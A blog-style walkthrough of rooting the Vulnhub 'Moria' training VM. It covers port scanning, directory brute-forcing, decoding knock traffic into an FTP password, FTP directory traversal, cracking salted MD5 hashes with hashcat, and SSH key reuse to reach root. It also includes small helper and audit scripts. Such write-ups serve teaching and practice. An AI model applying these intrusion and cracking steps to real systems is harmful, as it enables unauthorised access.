Vulnhub Moria Walkthrough

I spent some time with Moria (v1.1) this past week…super fun machine and a good exercise in thinking outside the box.

And without further ado…here’s Moria.

Nmap shows…

root@kali:~/vulnhub/moria# cat moria.nmap 
# Nmap 7.60 scan initiated Mon Nov  6 18:34:11 2017 as: nmap -sS -sV -oA moria
Nmap scan report for
Host is up (0.00031s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:D5:6D:D5 (VMware)

Service detection performed. Please report any incorrect results at .
# Nmap done at Mon Nov  6 18:34:25 2017 -- 1 IP address (1 host up) scanned in 14.47 seconds

Checking out port 80 we see….

Uh…sure. Admittedly, I’m not good at being a geek. I know this is LOTR related, but meh…I take note, and run gobuster.

root@kali:~/vulnhub/moria# gobuster -u -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 403,500,200,204,301,302,307
[+] Expanded     : true
===================================================== (Status: 403) (Status: 403) (Status: 403) (Status: 403) (Status: 200) (Status: 301)

Nothing too interesting…let’s see what’s what in w.

WUT? We keep digging and to save some reading time, we end up with http://moria/w/h/i/s/p/e/r/the_abyss — what’s interesting is that every page refresh presents something new.

We see: (with a refresh in between each one)

Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"

Alrighty then. So…I wasn’t sure what was going on here yet. I went back to the image on the home page. Is there a secret message? I’m not sure…so I saved the image locally, and tried to extract any info out of it using stegosuite.

root@kali:~/vulnhub/moria# stegosuite -x moria.jpg 
Loading jpg image from /root/vulnhub/moria/moria.jpg
Extracting data...
Nf weder 1 noch 3

Interesting. Throwing that into Google, we get the idea that “weder noch” means “neither nor” – so neither 1 nor 3. Honestly, I have no idea if this was any kind of hint or what, but for what it’s worth, I included it here…at least to introduce you to stegosuite perhaps if you haven’t encountered it before.

Ok…so where were we? After reviewing the phrases on “the_abyss,” we see a theme of hearing, listening, knocking. So let’s listen. Fire up Wireshark, and we see this (output below is filtered, but the content is what we’re interested in).

This pattern repeats, over and over. Destination ports 77, 101, 108, 108, 111, 110, 54, 57. I tried several times to see if port knocking would have any effect using the specified order, but no such luck. Nmap scans returned no new ports, and nothing seemed to be changing. As Telchar said to Thrain, “That human is slow, don’t give up yet.”

Being a slow human, I wasted some time trying to figure out what this meant. Ultimately, I landed here:, and finally figured out that 77, 101, 108, 108, 111, 110, 54, 57 converted to ASCII gives us “Mellon69” … ok then. Looks like a password to me. Where can we use it? How about that ftp server?
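The decoding step above, as an added example that is not part of the original walkthrough: it pulls SYN destination ports out of tcpdump-style text, reduces the repeating stream to one cycle, and reads the cycle as ASCII. The capture lines, addresses and source port are constructed placeholders; only the port sequence comes from the text.

```python
import re

# Constructed tcpdump-style lines (placeholder addresses and source port):
# three repetitions of the destination-port sequence quoted in the text.
OBSERVED = [77, 101, 108, 108, 111, 110, 54, 57]
SAMPLE_CAPTURE = "\n".join(
    f"18:40:{i:02d}.000000 IP 192.0.2.10.40000 > 192.0.2.20.{port}: "
    "Flags [S], seq 0, win 512, length 0"
    for i, port in enumerate(OBSERVED * 3)
)

# Destination port of each SYN: the last dotted field before the colon.
SYN_DST = re.compile(r" > \d+\.\d+\.\d+\.\d+\.(\d+): Flags \[S\]")

def dst_ports(capture):
    """Destination ports of SYN packets, in capture order."""
    return [int(m.group(1)) for m in SYN_DST.finditer(capture)]

def shortest_period(seq):
    """Smallest prefix that, repeated, reproduces the whole sequence."""
    for n in range(1, len(seq) + 1):
        if all(seq[i] == seq[i % n] for i in range(len(seq))):
            return seq[:n]
    return seq

def decode_ports(ports):
    """Read ports as ASCII codes; None unless every value is printable."""
    if ports and all(32 <= p <= 126 for p in ports):
        return "".join(chr(p) for p in ports)
    return None

if __name__ == "__main__":
    cycle = shortest_period(dst_ports(SAMPLE_CAPTURE))
    print(cycle, "->", decode_ports(cycle))
```

A capture that starts mid-cycle yields a rotation of the string, so it is worth checking where the sequence wraps before treating it as a credential.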

After trying a few defaults (admin, root, moria, etc.) I noticed the FTP welcome message: “Welcome Balrog” – so I try that…and success!

root@kali:~/vulnhub/moria# ftp
Connected to
220 Welcome Balrog!
Name ( Balrog
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

A little exploration leads to…directory traversal. Excellent…let’s see what we can find.

ftp> pwd
257 "/prison"
ftp> cd /
250 Directory successfully changed.
ftp> pwd
257 "/"
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Mar 11  2017 bin -> usr/bin
dr-xr-xr-x    4 0        0            4096 Mar 11  2017 boot
drwxr-xr-x   21 0        0            3240 Nov 08 06:07 dev
drwxr-xr-x   97 0        0            8192 Nov 10 00:35 etc
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

We’ve found that we can break out of /prison, and explore the file system. In /var/www/html, we find an interesting directory…what can that be?

Looks like some md5 hashes. I took the hashes, threw them into hashcat against rockyou, and nothing…generated some LOTR wordlists…nothing. Hmph. Perhaps I should’ve dug deeper. (use the source, Luke). Viewing the source of the page shows us that this is an md5(md5(password).salt) hash. Oh…and it conveniently gives us the salt value as well. Good deal.

A little Googling shows that the proper hashcat mode is 2611.
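What md5(md5(password).salt) actually computes, as an added example that is not part of the original walkthrough: the inner MD5 is taken as a lowercase hex string, the salt is appended, and the result is hashed again, which is why the same digests fed in as plain MD5 never match. The password, salt and candidate list are constructed; the hash:salt line layout is the one hashcat expects for mode 2611.

```python
import hashlib

def md5hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def vb_hash(password, salt):
    """md5(md5(password).salt): the inner digest is used as 32 lowercase hex
    characters, then the salt is appended before the second MD5."""
    return md5hex(md5hex(password) + salt)

def parse_line(line):
    """Split a 'hash:salt' line; the salt itself may contain ':'."""
    digest, salt = line.strip().split(":", 1)
    return digest.lower(), salt

def check_candidates(hash_lines, candidates):
    """Return {hash_line: candidate} for each candidate that reproduces a hash."""
    targets = [(ln.strip(), *parse_line(ln)) for ln in hash_lines if ln.strip()]
    found = {}
    for word in candidates:
        inner = md5hex(word)  # independent of the salt, so computed once
        for line, digest, salt in targets:
            if md5hex(inner + salt) == digest:
                found[line] = word
    return found

# Constructed sample: password and salt are made up for this example.
SAMPLE_LINE = vb_hash("hunter2", "s4:lt") + ":s4:lt"

if __name__ == "__main__":
    print(check_candidates([SAMPLE_LINE], ["123456", "hunter2"]))
    # The same digest compared as plain MD5 matches nothing:
    print(md5hex("hunter2") == parse_line(SAMPLE_LINE)[0])
```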

root@wopr/Users/gmurphy/hashcat$ cat moria.hashes

root@wopr/Users/gmurphy/hashcat$ ./hashcat -m 2611 -a 0 moria.hashes rockyou.txt
hashcat (v3.5.0-149-g23b5e7f) starting...

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14343298
* Bytes.....: 139921513
* Keyspace..: 14343298


Session..........: hashcat
Status...........: Cracked
Hash.Type........: vBulletin < v3.8.5
Hash.Target......: moria.hashes
Time.Started.....: Wed Nov  8 00:56:47 2017 (0 secs)
Time.Estimated...: Wed Nov  8 00:56:47 2017 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 48572.0 kH/s (7.24ms)
Recovered........: 9/9 (100.00%) Digests, 9/9 (100.00%) Salts
Progress.........: 5898375/129089682 (4.57%)
Rejected.........: 135/5898375 (0.00%)
Restore.Point....: 0/14343298 (0.00%)
Candidates.#2....: 123456 -> grape06

Started: Wed Nov  8 00:56:38 2017

Great…now we have what seems to be some usernames and passwords. Enumerating through the list lands us an SSH login using Ori. Let’s dig in…

root@kali:~/vulnhub/moria# ssh Ori@
Ori@'s password: 
Last login: Thu Nov 9 17:56:44 2017 from
-bash-4.2$ ls -lah
total 16K
drwx------  3 Ori  notBalrog   55 Nov  9 19:59 .
drwxr-x---. 4 root notBalrog   32 Mar 14  2017 ..
-rw-------  1 Ori  notBalrog 9.2K Nov  9 17:57 .bash_history
drwx------  2 Ori  notBalrog   57 Mar 12  2017 .ssh
-rw-r--r--  1 root root       225 Mar 13  2017 poem.txt
-bash-4.2$ cat poem.txt 
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by. 

PS: Moria will not fall!

Poem.txt doesn’t really show anything interesting, but at least I have a good drinking song for my upcoming guys’ weekend! But I digress…back to the good stuff.

Let’s check out .ssh and see what we find.

-bash-4.2$ ls -lah 
total 12K
drwx------ 2 Ori notBalrog   57 Mar 12  2017 .
drwx------ 3 Ori notBalrog   55 Nov  9 19:59 ..
-rw------- 1 Ori notBalrog 1.7K Mar 12  2017 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12  2017
-rw-r--r-- 1 Ori notBalrog  342 Nov  9 18:12 known_hosts
-bash-4.2$ cat known_hosts
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

So Ori has ssh’d into before. Interesting indeed. Two things to take note of here, if you’re not familiar with public key authentication:

  • “known_hosts” contains the public keys of hosts that you have previously SSH’d into
  • “authorized_keys” specifies the SSH keys that can be used for logging into a user account when public key auth is configured

With that…let’s see if we’re lucky enough that Ori’s key was in root’s “authorized_keys”.

-bash-4.2$ ssh root@ -i id_rsa
Last login: Thu Nov  9 22:42:22 2017 from
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?

[root@Moria ~]#


Excellent! Root it is. Nicely done challenge, Abatchy.
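The root login worked because a low-privileged user's key was listed in root's “authorized_keys”. An added example (not part of the original walkthrough, and not the VM author's code) of auditing for that condition: it compares each user's public key against a privileged account's authorized_keys and reports matches by SHA256 fingerprint. User names, key blobs and file contents are constructed placeholders, and the option parsing is a simplification that assumes no quoted option contains spaces.

```python
import base64
import hashlib

def parse_keys(text):
    """Map key blob -> comment for each key line (authorized_keys or .pub)."""
    keys = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as from="..." may precede the key type token.
        for i, token in enumerate(fields[:-1]):
            if token.startswith(("ssh-", "ecdsa-", "sk-")):
                keys[fields[i + 1]] = " ".join(fields[i + 2:])
                break
    return keys

def fingerprint(blob_b64):
    """SHA256 fingerprint in the form ssh-keygen -l prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def keys_accepted_by(target_authorized_keys, user_pubkeys):
    """List (user, fingerprint) for each user key the target account accepts."""
    accepted = parse_keys(target_authorized_keys)
    return [(user, fingerprint(blob))
            for user, text in user_pubkeys.items()
            for blob in parse_keys(text)
            if blob in accepted]

def _blob(label):
    # Constructed stand-in for a key blob; not a real SSH key.
    return base64.b64encode(label.encode()).decode()

# Constructed sample data (user names and keys are placeholders).
USER_PUBKEYS = {
    "ori": f"ssh-rsa {_blob('constructed-key-1')} ori@example",
    "nain": f"ssh-rsa {_blob('constructed-key-2')} nain@example",
}
ROOT_AUTHORIZED_KEYS = "\n".join([
    "# constructed /root/.ssh/authorized_keys",
    f"ssh-ed25519 {_blob('constructed-admin-key')} admin@example",
    f'from="192.0.2.0/24" ssh-rsa {_blob("constructed-key-1")} ori@example',
])

if __name__ == "__main__":
    for user, fp in keys_accepted_by(ROOT_AUTHORIZED_KEYS, USER_PUBKEYS):
        print(f"{user}: key {fp} is accepted for root")
```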

Thanks for reading…hopefully you have learned something.